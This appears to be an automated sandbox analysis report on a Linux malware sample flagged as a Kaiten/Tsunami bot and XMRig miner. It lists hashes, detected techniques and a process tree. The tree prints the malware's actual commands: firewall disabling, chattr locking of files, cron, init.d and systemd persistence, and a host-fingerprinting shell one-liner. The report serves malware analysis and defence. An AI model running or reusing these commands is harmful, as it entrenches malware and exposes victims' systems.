Analysis
-
max time kernel
149s -
max time network
149s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
11-10-2024 20:27
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
-
Size
3.2MB
-
MD5
396a812c15bd9809d0c8f438b8517827
-
SHA1
6a8eb0ee0a05cede17a50ec04b0a549d70325dcb
-
SHA256
d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
-
SHA512
83ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948
-
SSDEEP
98304:EenYv0GcTOR0aUripytWEGYk91lRujZv9I:bYoOjGhnGPLlqZvW
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/3981-4-0x0000716c7331e000-0x0000716c73332700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 1 IoCs
resource yara_rule behavioral1/memory/3981-4-0x0000716c7331e000-0x0000716c73332700-memory.dmp family_kaiten -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/2475-2-0x000075497e600000-0x000075497ecbed40-memory.dmp xmrig behavioral1/memory/3065-3-0x000079c21d000000-0x000079c21d6bed40-memory.dmp xmrig -
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 3115 sh 3131 chmod 3269 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /etc/init.d/dpkg-deb-package 2468 dpkg-deb-package /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 2475 -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 3065 -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /tmp/-python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c42 3981 -python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c42 -
Attempts to change immutable files 17 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 3115 sh 3118 chattr 3120 sed 3132 chattr 3532 sed 3069 hostname 3527 chattr 3533 chattr 3064 chattr 3066 sh 3268 sed 3525 chattr 3063 chattr 3123 chattr 3125 chattr 3130 sed 3135 chattr -
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_name -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -
Creates/modifies Cron job 1 TTPs 17 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.monthly/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.daily/sedIG2O5J sed File opened for modification /etc/cron.hourly/sedrTIEaW sed File opened for modification /etc/cron.weekly/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.weekly/sedvayXbC sed File opened for modification /etc/cron.d/sedBjl0eJ sed File opened for modification /etc/cron.monthly/sedRvEkXU sed File opened for modification /var/spool/cron/crontabs/tmp.5xABfs crontab File opened for modification /etc/cron.d/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /var/spool/cron/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/cron.daily/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.hourly/.lib-knlib4 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.hourly/pwnrig tee -
Enumerates active TCP sockets 1 TTPs 3 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/tcp SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/net/tcp lsof -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/dpkg-deb-package SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedzNCVCQ sed -
Modifies systemd 2 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/dpkg-deb-package.service SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee -
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_type -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_name -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_date -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_version -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_uuid -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_type -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_uuid -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/product_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_serial -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_name -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id/bios_date -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -
Writes file to system bin folder 5 IoCs
description ioc Process File opened for modification /bin/dpkg-debian SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp -
Security Software Discovery 1 TTPs 2 IoCs
Adversaries may attempt to discover installed security software and its configurations.
pid Process 2648 sh 2661 sh -
resource yara_rule behavioral1/files/fstream-2.dat upx behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-35.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself (sysv-install) 2658 systemctl -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo ps File opened for reading /proc/cpuinfo ps File opened for reading /proc/cpuinfo -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /proc/cpuinfo grep -
Reads CPU attributes 1 TTPs 17 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/online -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/types -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/types -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/online -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/cpu/possible ps -
Reads system network configuration 1 TTPs 40 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/udp lsof File opened for reading /proc/net/tcp SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/net/unix lsof File opened for reading /proc/net/raw6 lsof File opened for reading /proc/net/udp6 lsof File opened for reading /proc/net/udplite6 lsof File opened for reading /proc/net/sockstat lsof File opened for reading /proc/net/raw6 lsof File opened for reading /proc/net/sockstat lsof File opened for reading /proc/net/sockstat6 lsof File opened for reading /proc/net/udp SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/net/packet lsof File opened for reading /proc/net/udp6 lsof File opened for reading /proc/net/sctp/assocs lsof File opened for reading /proc/net/sctp/eps lsof File opened for reading /proc/net/raw lsof File opened for reading /proc/net/tcp6 lsof File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/udplite lsof File opened for reading /proc/net/tcp6 lsof File opened for reading /proc/net/ipx lsof File opened for reading /proc/net/unix lsof File opened for reading /proc/net/sockstat6 lsof File opened for reading /proc/net/raw lsof File opened for reading /proc/net/icmp lsof File opened for reading /proc/net/ax25 lsof File opened for reading /proc/net/ipx lsof File opened for reading /proc/net/netlink lsof File opened for reading /proc/net/sctp/eps lsof File opened for reading /proc/net/tcp6 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/net/udp6 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/net/netlink lsof File opened for reading /proc/net/icmp lsof File opened for reading /proc/net/ax25 lsof File opened for reading /proc/net/packet lsof File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/udplite lsof File opened for reading /proc/net/sctp/assocs lsof File opened for reading /proc/net/udplite6 lsof File opened for reading /proc/net/udp lsof -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node pgrep File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/dax/devices/target_node -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node ps File opened for reading /sys/fs/cgroup/cpuset.cpus.effective -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/cpumap -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/dax/devices/target_node -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/fs/cgroup/cgroup.controllers -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/meminfo -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/hugepages -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/access0/initiators -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node pgrep File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/fs/cgroup/cpuset.mems.effective -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node pgrep File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/virtual/dmi/id -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/fs/cgroup/cpuset.cpus.effective -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/dax/target_node -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/access1/initiators -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/meminfo -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/devices/system/node/online -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
pid Process 2650 ps 2664 ps -
description ioc Process File opened for reading /proc/2076/ctty pgrep File opened for reading /proc/8/stat lsof File opened for reading /proc/195/stat lsof File opened for reading /proc/1/fdinfo/225 lsof File opened for reading /proc/13/ctty pkill File opened for reading /proc/47/status ps File opened for reading /proc/190/status ps File opened for reading /proc/1730/fdinfo/21 lsof File opened for reading /proc/1895/cmdline pgrep File opened for reading /proc/1872/status ps File opened for reading /proc/441/cmdline ps File opened for reading /proc/1923/ctty ps File opened for reading /proc/2076/stat ps File opened for reading /proc/1119/cmdline pgrep File opened for reading /proc/1891/status pgrep File opened for reading /proc/5/ctty ps File opened for reading /proc/591/fdinfo/17 lsof File opened for reading /proc/1062/fdinfo/6 lsof File opened for reading /proc/1624/stat lsof File opened for reading /proc/2513/status ps File opened for reading /proc/1392/fd SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for reading /proc/2/status ps File opened for reading /proc/2220/status pgrep File opened for reading /proc/2180/status ps File opened for reading /proc/2214/cmdline pgrep File opened for reading /proc/2538/status ps File opened for reading /proc/70/environ ps File opened for reading /proc/780/cgroup pgrep File opened for reading /proc/1723/ctty ps File opened for reading /proc/2102/status pkill File opened for reading /proc/751/environ ps File opened for reading /proc/35/ctty ps File opened for reading /proc/197/stat lsof File opened for reading /proc/189/stat pgrep File opened for reading /proc/19/status ps File opened for reading /proc/1916/cgroup pkill File opened for reading /proc/780/status pgrep File opened for reading /proc/38/stat ps File opened for reading /proc/38/cgroup pkill File opened for reading /proc/1392/cmdline pgrep File opened for reading /proc/2193/stat ps File opened for reading /proc/1119/fdinfo/24 lsof File opened for reading /proc/1048/status pgrep File opened for reading /proc/1818/status ps File opened for reading /proc/1943/stat pkill File opened for reading /proc/36/status ps File opened for reading /proc/432/stat ps File opened for reading /proc/1125/status pgrep File opened for reading /proc/389/stat ps File opened for reading /proc/1746/fdinfo/1 lsof File opened for reading /proc/1648/cgroup pgrep File opened for reading /proc/2030/stat ps File opened for reading /proc/1818/environ ps File opened for reading /proc/1898/fdinfo/3 lsof File opened for reading /proc/235/status pkill File opened for reading /proc/27/cmdline ps File opened for reading /proc/1643/fdinfo/21 lsof File opened for reading /proc/432/ctty pgrep File opened for reading /proc/42/environ ps File opened for reading /proc/70/status ps File opened for reading /proc/7/ctty ps File opened for reading /proc/2099/fdinfo/8 lsof File opened for reading /proc/1391/cmdline pgrep File opened for reading /proc/3107/stat ps -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /tmp/.lock -bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 File opened for modification /tmp/.klibsystem5 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/-python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c42 SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf File opened for modification /tmp/.bashirc -python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c42
Processes
-
/tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf/tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf1⤵
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to tmp directory
PID:2435 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:2442
-
-
/usr/bin/lsoflsof -t -i :4442⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:2443
-
-
/usr/bin/lsoflsof -t -i :594752⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:2455
-
-
/usr/bin/pgreppgrep -f ksysrvthread2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2463
-
-
/usr/bin/pgreppgrep -f sysrv2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2464
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2465
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:2466
-
-
/usr/bin/chattrchattr +ia /etc/init.d/dpkg-deb-package2⤵PID:2467
-
-
/etc/init.d/dpkg-deb-package/etc/init.d/dpkg-deb-package start2⤵
- Executes dropped EXE
PID:2468 -
/usr/bin/cpcp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package3⤵PID:2469
-
-
/usr/bin/nohupnohup ./dpkg-deb-package3⤵PID:2470
-
-
/usr/bin/rmrm -rf -- dpkg-deb-package3⤵PID:2471
-
-
/usr/bin/dpkg-deb-package./dpkg-deb-package3⤵PID:2470
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/dpkg-deb-package.service2⤵PID:2473
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵PID:2474
-
-
/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2475 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2570
-
/usr/bin/hostnamehostname -I4⤵PID:2575
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2578
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2589
-
-
/usr/bin/grepgrep "Port "4⤵PID:2591
-
-
/usr/bin/headhead -n 14⤵PID:2592
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2593
-
-
/usr/bin/whoamiwhoami4⤵PID:2599
-
-
/usr/bin/hostnamehostname4⤵PID:2603
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2607
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2610
-
-
/usr/bin/cutcut -d: -f24⤵PID:2611
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2612
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2613
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2620
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2623
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2627
-
-
